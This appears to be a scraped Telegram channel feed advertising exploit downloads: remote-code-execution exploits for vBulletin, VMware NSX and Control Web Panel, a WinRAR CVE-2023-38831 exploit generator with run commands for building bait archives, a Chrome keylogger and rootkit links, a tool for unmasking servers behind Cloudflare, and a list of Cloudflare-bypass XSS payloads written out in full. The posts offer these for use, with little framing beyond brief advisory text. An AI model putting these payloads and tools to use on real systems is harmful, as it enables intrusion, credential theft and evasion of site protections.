vBulletin_5.5.2
vBulletin 5.5.2 PHP Object Injection Exploit

🌐Github

#RemoteCode #Exploit #Php #Injection
➗➗➗➗➗➗➗➗➗➗➗➗
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/SashClient
🪩 Https://discord.gg/UfFvDYBBMM
🌐 Https://sash.mybin.ir

VMware-NSX-Manager-XStream
VMware NSX Manager XStream Unauthenticated Remote Code Execution Exploit

CVE : CVE-2021-39144

🌐Github

#RemoteCode #Exploit #Php #Injection
➗➗➗➗➗➗➗➗➗➗➗➗
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/SashClient
🪩 Https://discord.gg/UfFvDYBBMM
🌐 Https://sash.mybin.ir

CVAT 2.0 - SSRF (Server Side Request Forgery)

🗂 Description:
#CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability.
#Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade.

⌨ Type: webapps

💻 Platform: Python

🌐 Vendor Homepage: 🌐Github

🛡 Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)

👑 CVE: CVE-2022-31188

#CVE #SSRF #Exploit #Python
➗➗➗➗➗➗➗➗➗➗➗➗
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/SashClient
🪩 Https://discord.gg/UfFvDYBBMM
🌐 Https://sash.mybin.ir

Control Web Panel Unauthenticated Remote Command Execution Exploit

➖ Category: remote exploits

🖥 Platform: linux

🪖 Risk: Security Risk Critical 🚨

🗂️ Size: 🅰🅰🅰📝📝

📝
Description: Control Web Panel versions prior to 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.

⭐ CVE: CVE-2022-44877

#CVE #Linux #Exploit
➗➗➗➗➗➗➗➗➗➗➗➗
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/SashClient
🪩 Https://discord.gg/UfFvDYBBMM
🌐 Https://sash.mybin.ir

Exploits bank of NMAP program

🔗 Link

#Nmap #Vuln #Exploit
➗➗➗➗➗➗➗➗➗➗➗➗
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3

Post exploitation tools:

➕ Vegile — Ghost In The Shell:
😸 GitHub

➕ Chrome Keylogger:
😸 GitHub

➕ Forensic tools

➕ Autopsy:
😸 GitHub

➕ Wireshark:
🌐 Site

➕ Bulk extractor:
😸 GitHub

➕ Disk Clone and ISO Image Aquire:
🌐 Site

➕ Toolsley:
🌐 SIte

#RootKit #Keylogger #Exploit #Tools
➗➗➗➗➗➗➗➗➗➗➗➗
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3

Marijuana Exploit 🍀

⬇️ Download

🔒 @LearnExploit

#Exploit #Bot
➗➗➗➗➗➗➗➗➗➗➗➗
🔥 0Day.Today
👤 t.iss.one/BugCod3
📢 t.iss.one/LearnExploit

🪳CVE-2023-38831 winrar exploit generator 🪳

👥 Quick poc test:
Generate the default poc for test

python cve-2023-38831-exp-gen.py poc

or

python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat  poc.rar

👤 Custom:
⚪️ Place the bait file and (evil) script file in the current directory, the bait file is recommended to be an image (.png, jpg) or a document (.pdf)
⚪️ Run

python cve-2023-38831-exp-gen.py <bait name> <script name> <output name>

to generate your exploit

👆 Analysis Blog
👁‍🗨 Reference
😸 Github

⬇️ Download
🔒 BugCod3

#CVE #Winrar #Exploit
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

💜 CloudPeler 💜

📊 CrimeFlare is back again! This tools can help you to see the real IP behind CloudFlare protected websites

👁‍🗨 Introduction:
This tool serves to find the original IP behind websites that have been protected by CloudFlare, the information generated can be useful for further penetration. The information generated by this tool is as follows.

⚪️ CloudFlare IP
⚪️ CloudFlare NS1
⚪️ CloudFlare NS2
⚪️ Real IP
⚪️ Hostname
⚪️ Organization
⚪️ Address (Country, City, Region, Postal Code)
⚪️ Location
⚪️ Time Zone

💻 Code Samples:
This tool is made with PHP code with very simple programming using several APIs to get maximum results, but this tool does not guarantee 100% to be able to bypass websites that have been protected by CloudFlare. Some websites sometimes cannot be detected by their original IP.

📱 Installation:

sudo apt install php-curl
cd CloudPeler
./crimeflare.php exemple.com

😸 Github

⬇️ Download
🔒 BugCod3

#Cloudflare #Bypass #Exploit
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

⚡️ Cloud7 Bot Exploit ⚡️

Run Script with Python 2.7

📊 Recommended:

python -m pip install requests
python -m pip install bs4
python -m pip install colorama
python -m pip install lxml

⬇️ Download
🔒 @LearnExploit

#Exploit #Tools
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

Cloudflare bypass XSS payloads

Tested On: 👩‍💻

XSS Payloads:

for(t?c.outerHTmL=o:i=o=’’;i++<1024;o+=`<code onclick=this.innerHTmL=’${M(i)?’*’:n||’·’}’>#</code>${i%64?’’:’<p>’}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7
javascript:{alert ‘0’ }
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
<svg/OnLoad="`${prompt``}`">

#Exploit #XSS #Payload
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

🐱 SiCat 🐱

The useful exploit finder

💬
SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.

🔼 Installation:

pip  install  -r  requirements.txt

💻 Usage:

python sicat.py --help

📂 Example:
From keyword:

python sicat -k telerik --exploitdb --msfmodule

From nmap output:

nmap -sV localhost -oX nmap_out | python sicat -nm --packetstorm

😸 Github

⬇️ Download
🔒 BugCod3

#Exploit #Metasploit #Finder
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3